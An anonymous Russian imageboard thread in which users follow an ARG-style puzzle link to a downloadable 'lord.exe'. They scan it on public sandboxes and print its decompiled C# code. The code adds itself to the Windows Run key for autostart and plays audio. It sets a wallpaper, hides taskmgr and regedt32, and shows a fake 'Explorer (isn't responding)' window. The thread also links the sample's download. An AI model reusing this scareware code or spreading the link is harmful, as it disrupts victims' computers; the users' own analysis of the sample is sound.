Hankclan.biz ==> http://hankclan.biz/52821993722572.html

>>163959831
Куда там нажимать ?

>>163959999
Непонял, если ты про первую ссылку то там при копировании текста выделяются невидимые цифры

>>163960039
И добавив к hankclan.biz/ эти цифры + .html покажется дьявол

Опять эти арг всякие

>>163960091
НО при первом переходе мне показало какую-то загадку, я закрыл вкладку случайно зассал чего-то, а потом переходя по ссылке показался этот демон

>>163960136
Как что-то плохое перейди по ссылке , если покажется НЕ ДЕМОН, то скинь скрин в чат позязя :3

>>163960237
Это что-то на CICADA 3310 похоже

>>163960285
Похожее*

>>163960294
Ты Иисус , а я походу даун

>>163960285
>CICADA 3310
Что это ?

>>163960399
Неужели гугол и википедия забанила?

>>163960496
CICADA 3310 - это группа сектантов, которые вербуют к себе людей прошедших испытания-загадки

>>163960571
По ссылке какой то файл скачивается

ufile.io/a4lc7

Подпишсь на тред, аноны, гадайте, а результаты сюда. А я смотреть буду.

>>163960677
lord.exe весом в 26мб
Сейчас попробую чего-нибудь с ним сделать

>>163960749
Только со скринами плес

>>163959779 (OP)
Это идионфекция. Вы идионфецированы. ньбфаги не знают

>>163960832
Я с телефона, не могу файл открыть

>>163960793
https://www.virustotal.com/#/file/77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653/detection
Вроде чисто,но имя файла показывает как 666.exe
Вместо lord.exe

>>163960832
Нужно ставить виртуалку,но мне очень лень

>>163960923
Это ноунейм же антивирусы

>>163961000
Все равно подозрительно.

>>163960982
Тогда ждите,пока образ скачаю и саму vb

>>163961028
Не над, я уже.

>>163961053
Ну и шо тама ?

>>163961013
> Название файла 666.ехе
> подозрительно

>>163961053
Скрины в студию

>>163961102
Please wait while VxStream Sandbox v7.00 is processing your sample (SHA256: 77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653).
Once the analysis is completed you will be redirected automatically.

>>163961128
Там ещё на сайте логгер есть
http://scorecard.wspisp.net/logger.php

>>163959779 (OP)
Хуясе, вот это зашел на двачик мдо.

>>163961269
Тебя сейчас рептилойды к себе завербуют, беги отсюда

>>163961306
Кароч,если погуглить,то VxStream Sandbox это что-то типа rat'ника

>>163961396
> Кароч,если погуглить,то VxStream Sandbox это что-то типа rat'ника
Для не просвященных поясни что это такое

>>163961396
This webpage is a free malware analysis service powered by Payload Security that detects and analyzes unknown threats using a unique Hybrid Analysis technology.

>>163961428
rat - удалённое управление компьютером
Там их много разновидностей,но суть такова
Кароч,я не думаю,что это что-то в духе цикады
Просто кто-то решил сыграть на любопытности людей

>>163961432
https://www.youtube.com/watch?v=lPhDtPa0QMg

>>163961428
Ремоте Администратион Тул

https://www.hybrid-analysis.com/sample/77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653?environmentId=100

>>163961516
>>163961578
Спасибо за пояснение :3

>>163961516
>Просто кто-то решил сыграть на любопытности людей
Возможно.
Но возможно так же, что это следующий ключ к разгадке квеста.

>>163961387
Вряд ли. Если только на левое железо, которое под снос. Тут же все параноики.

>>163961674
С вирусней однозначно связано
Автоматизация чего-то там

>>163961724
> VirusMy228
> 4chan /х/
Ничего удивительного

Сетевой трафик

172.217.16.142 443
TCP - United States
172.217.16.142 80
TCP - United States
172.217.16.132 80
TCP - United States

>>163961724
Ставим wireshark и смотрим куда запросы идут,анализируем и готово

>>163961778
И ты жив ? не обосрался?

>>163961846
Ip адресс дьявола?

>>163961846
Мб он шлет запросы, пока не получит ответ?
Сколько он пакетов отослал уже?
И с какой переодичностью?

>>163961902
Вычислишь?

>>163962025
Я не погромист

https://www.hybrid-analysis.com/sample/77f288f58053243dc1359a01c794b15d807b4a7f08261a20f1aaac72a79f8653?environmentId=100

>>163961846
>172.217.16.142 80
>TCP - United States
>172.217.16.132 80
>TCP - United States
По этим гугл находится

Информация об ip-адресе 172.217.16.142

#OrgName: Google LLC

>>163961724
Блять, я думал ты прикалываешься

>>163962116
На C# накалякал какой-то школьник и пытается толкнуть

>>163961863
0Н УЖЕ С НАМИ

>>163962114
Корпорация добра?

Ребята не стоит вскрывать эту тему. Вы молодые, шутливые, вам все легко. Это не то. Это не Чикатило и даже не архивы спецслужб. Сюда лучше не лезть. Серьезно, любой из вас будет жалеть. Лучше закройте тему и забудьте что тут писалось. Я вполне понимаю что данным сообщением вызову дополнительный интерес, но хочу сразу предостеречь пытливых - стоп. Остальные просто не найдут.

/_°\

>>163962511
Как я и говорил.Школьник - быдлокодер толкает свой кривой вирус.Он даже не проверяет какая винда стоит,потому что в разных версиях - разные пути в реестре,для автозапуска.Даже стыдно немного за него

>>163962511
Короч вот весь код:
private void Form1_Load(object sender, EventArgs e)
{
Class3.Class2_0.Audio.Play(Class1.smethod_1(), AudioPlayMode.BackgroundLoop);
this.method_0(Class1.smethod_2());
this.Cursor = new Cursor(Class1.smethod_3().Handle);
Class3.Class2_0.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue(Application.ProductName, Application.ExecutablePath);
this.vmethod_0().Enabled = !this.vmethod_0().Enabled;
VBMath.Randomize();
int num = checked((int)Math.Round((double)Conversion.Int(99999f VBMath.Rnd() + 1f)));
Process process = new Process();
process.StartInfo.WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.System);
process.StartInfo.FileName = "taskmgr.exe";
process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
base.Focus();
process.StartInfo.WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.System);
process.StartInfo.FileName = "regedt32.exe";
process.StartInfo.CreateNoWindow = true;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
base.Focus();
}

[DebuggerStepThrough]
private void InitializeComponent()
{
this.icontainer_0 = new Container();
this.vmethod_1(new Timer(this.icontainer_0));
base.SuspendLayout();
this.vmethod_0().Interval = 200;
base.AutoScaleDimensions = new SizeF(6f, 13f);
base.AutoScaleMode = AutoScaleMode.Font;
base.ClientSize = new Size(212, 206);
base.ControlBox = false;
base.FormBorderStyle = FormBorderStyle.None;
base.Margin = new Padding(2);
base.Name = "Form1";
base.Opacity = 0.01;
base.ShowIcon = false;
base.ShowInTaskbar = false;
this.Text = "Explorer (isn't responding)";
base.WindowState = FormWindowState.Maximized;
base.ResumeLayout(false);
}

internal void method_0(Image image_0)
{
string str = Class3.Class2_0.FileSystem.CombinePath(Class3.Class2_0.FileSystem.SpecialDirectories.MyPictures, "c:\\wallpaper.bmp");
try
{
image_0.Save(str, ImageFormat.Bmp);
Form1.SystemParametersInfo(20, 0, ref str, 3);
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
Exception exception = exception1;
Interaction.MsgBox(string.Concat("There was an error setting the wallpaper: ", exception.Message), MsgBoxStyle.OkOnly, null);
ProjectData.ClearProjectError();
}
}

private void method_1(object sender, EventArgs e)
{
if (base.Opacity <= 0.05 | base.Opacity >= 0.65)
{
this.double_0 = -this.double_0;
}
base.Opacity = base.Opacity + this.double_0;
this.BackColor = Color.FromArgb(checked((int)Math.Round((double)(255f VBMath.Rnd()))), 0, 0);
}

Ставим обоину и играем звуки. Ну и в автозагрузку прописываемся.

>>163962666
Ебаный демон

>>163962666
Ни тебе try catch.В ООП пацан не шарит,от слова "Совсем".Реализовал в ооп среде процедурный код,красавец

>>163962861
>VBMath.Rnd()
Я думаю тут и говорить не о чем.

>>163962903
Особенно имена "методов" доставили
method_0 и method_1
Это гениально

>>163962979
ООП ЖЕ ТАМ МЕТАДЫ РЕБЯТ Я ШАРЮ

>>163962979
Ты дебич? Это деобфускатор переименовал битые имена.

>>163964520
Тем не менее,это не отменяет того,что он криворукий

>>163964628
Он на vb.net писал, там все кривое.

Киньте загадку от настоящей цикады чтоли

>>163966335
Я просто хуй, сижу на паре и не могу искать